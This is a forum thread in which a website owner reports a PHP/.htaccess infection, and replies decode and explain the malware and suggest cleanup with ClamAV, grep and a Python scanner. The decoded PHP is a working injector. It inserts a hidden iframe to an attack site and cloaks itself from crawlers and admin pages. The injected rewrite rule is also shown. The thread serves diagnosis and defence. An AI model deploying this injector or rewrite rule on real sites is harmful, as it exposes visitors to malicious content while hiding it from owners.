I have noticed that when I try to access my websites, it redirects me to a strange file called PExxxxxxxx.php. This happens with all of my domains. I have also noticed that all of my .htaccess files have been changed to contain the following:

    #65FDA983BAA2{
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} GET
    RewriteCond %{REQUEST_FILENAME} -f
    RewriteCond %{REQUEST_FILENAME} !PE(.*).php
    RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) PE65FDA983BAA2.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
    #65FDA983BAA2}

The PExxxxxx.php files have this encrypted code in them:

    <?php eval(base64_decode('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')); ?>

What should I do? How do I clean my account of this virus? Thanks.
If your server runs Linux and uses cPanel/WHM, you can install and use ClamAV, which is free. This will somehow resolve the issue.
DECODE:

    <?php
    // Hidden iframe that gets injected into every served page.
    $IIIIIIIIIIII = '<div style="display:none">&nbsp; &nbsp;<iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>';

    // Resolve the directory of the requested script (the qq= value set by .htaccess).
    function IIIIIIIIIIII($IIIIIIIIIIIl) {
        global $argv;
        $IIIIIIIIIIlI = dirname(getcwd() . '/' . $IIIIIIIIIIIl);
        $IIIIIIIIIIll = getcwd();
        @chdir($IIIIIIIIIIlI);
        $IIIIIIIIIIlI = getcwd();
        @chdir($IIIIIIIIIIll);
        return $IIIIIIIIIIlI;
    }

    // True for search-engine crawlers: they get the clean page so the infection stays hidden from indexers.
    function IIIIIIIIIIIl($IIIIIIIIIIl1) {
        if( strstr($IIIIIIIIIIl1, "Yandex/") != null || strstr($IIIIIIIIIIl1, "YaDirectBot") != null || strstr($IIIIIIIIIIl1, "James Bond") != null || strstr($IIIIIIIIIIl1, "Googlebot") != null || strstr($IIIIIIIIIIl1, "Mediapartners-Google") != null || strstr($IIIIIIIIIIl1, "StackRambler") != null || strstr($IIIIIIIIIIl1, "Slurp") != null || strstr($IIIIIIIIIIl1, "msnbot") != null ) {
            return true;
        }
        return false;
    }

    // True when the script path looks like an admin area (adm, pma, moder, cp), so the site owner does not see the iframe.
    function IIIIIIIIIII1($IIIIIIIIIIlI) {
        $IIIIIIIIII1I = array('adm', 'pma', 'moder', 'cp');
        $IIIIIIIIII1l = false;
        foreach ($IIIIIIIIII1I as $IIIIIIIIII11) {
            if(strstr($IIIIIIIIIIlI, $IIIIIIIIII11) != null) {
                $IIIIIIIIII1l = true;
            }
        }
        return $IIIIIIIIII1l;
    }

    // Output-buffer callback: strips competing hidden iframes/ads, then inserts the iframe after <body>.
    function IIIIIIIIIIlI($IIIIIIIIIlII) {
        global $IIIIIIIIIIII, $_SERVER;
        $IIIIIIIIIlII = preg_replace('/<iframe.*style=.*hidden.*\/iframe[^>]*>/i', "", $IIIIIIIIIlII);
        $IIIIIIIIIlII = preg_replace('/<div.*style=.*display:none.*[^>]*>.*<iframe .*\/.*div[^>]*>/i', "", $IIIIIIIIIlII);
        $IIIIIIIIIlII = preg_replace('/<!-- ad --><script[^>]*>.*<\/script><!-- \/ad -->/i', "", $IIIIIIIIIlII);
        if(IIIIIIIIIIIl($_SERVER['HTTP_USER_AGENT']) == true || IIIIIIIIIII1(dirname($_SERVER['SCRIPT_NAME'])) == true) {
            return $IIIIIIIIIlII;
        } else {
            if(preg_match("/(<body[^>]*>)/i", $IIIIIIIIIlII) > 0) {
                return preg_replace("/(<body[^>]*>)/i", "$IIIIIIIIIlI1 \n".$IIIIIIIIIIII, $IIIIIIIIIlII, 1);
            } else {
                return $IIIIIIIIIlII.$IIIIIIIIIIII;
            }
        }
    }

    // Serve the original file named in qq= through the filtering callback; fall back to the bare iframe.
    if(@ob_start('IIIIIIIIIIlI') == true) {
        $IIIIIIIIIIIl = $_GET['qq'];
        @chdir(IIIIIIIIIIII($IIIIIIIIIIIl));
        include($IIIIIIIIIIIl);
    } else {
        echo $IIIIIIIIIIII;
    }
    ?>

They add an iframe pointing to http://grizzli-counter.com/id120/index.php, an attack site. I think they used a local attack, or your server was rooted and infected.
Run ClamAV on all HTML/PHP files. It can find all infected files. Then just mass-replace those strings with blank.
Also, you can follow this way:

1. Find all newly modified files and grep for JElJSUl in them:

    # Search files modified in the last 3 days and print, per file, the count of lines containing "JElJSUl".
    # -H forces the "filename:count" form even though grep sees one file at a time.
    find /web/dir -type f -mtime -3 -exec grep -cH JElJSUl {} \;

2. Then edit the files with 1 suffixed (like 'index.php:1') one by one, so that you can get rid of such an attack completely.

The installation of ClamAV is highly recommended, as it helps you find iframe HTML code as well.
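To complement the find/grep step above, here is an added scanner (example code, not from anyone in this thread) that walks a web root, reports .htaccess files carrying the "#<HEX>{ ... #<HEX>}" rewrite block shown in the first post, and flags PHP files containing an eval(base64_decode(...)) loader. It assumes the marker is a run of hex characters of any length, that the loader is written on one line as in the PE*.php files, and it only reports; the demo builds a throwaway root with constructed content.

```python
import re
import tempfile
from pathlib import Path

# Injected .htaccess block: "#65FDA983BAA2{ ... #65FDA983BAA2}" in the post; the hex id is assumed to vary.
HTACCESS_BLOCK = re.compile(r"#([0-9A-Fa-f]+)\{.*?#\1\}\s*", re.S)
# One-line loader found in the dropped PE<HEX>.php files; the base64 payload itself varies.
EVAL_LOADER = re.compile(r"eval\s*\(\s*base64_decode\s*\(")


def strip_htaccess_block(text):
    """Return (cleaned_text, [hex ids]) with every injected rewrite block removed."""
    ids = [i.upper() for i in HTACCESS_BLOCK.findall(text)]
    return HTACCESS_BLOCK.sub("", text), ids


def scan(root):
    """Walk root; return {'htaccess': {path: [ids]}, 'loader': [paths]}."""
    findings = {"htaccess": {}, "loader": []}
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        try:
            data = p.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        if p.name == ".htaccess":
            _, ids = strip_htaccess_block(data)
            if ids:
                findings["htaccess"][str(p)] = ids
        elif p.suffix == ".php" and EVAL_LOADER.search(data):
            # PE<HEX>.php is the dropped shim; any other hit needs manual review.
            findings["loader"].append(str(p))
    return findings


def demo():
    """Constructed sample web root: one infected .htaccess, one shim, one clean file."""
    root = Path(tempfile.mkdtemp())
    (root / ".htaccess").write_text(
        "RewriteEngine On\n"
        "#65FDA983BAA2{ RewriteEngine On RewriteCond %{REQUEST_METHOD} GET "
        "RewriteRule (.*)\\.(php|html) PE65FDA983BAA2.php?%{QUERY_STRING}&qq=$1.$2 [NC,L] #65FDA983BAA2}\n"
        "RewriteRule ^blog/(.*)$ index.php?p=$1 [L]\n")
    (root / "PE65FDA983BAA2.php").write_text("<?php eval(base64_decode('QUJD')); ?>")  # constructed payload
    (root / "index.php").write_text("<?php echo 'hello'; ?>")
    return root, scan(root)


if __name__ == "__main__":
    print(demo()[1])
```

Review each reported file before deleting: the .htaccess block is removed by strip_htaccess_block, while loader hits in files other than PE*.php may be legitimate code that merely uses base64.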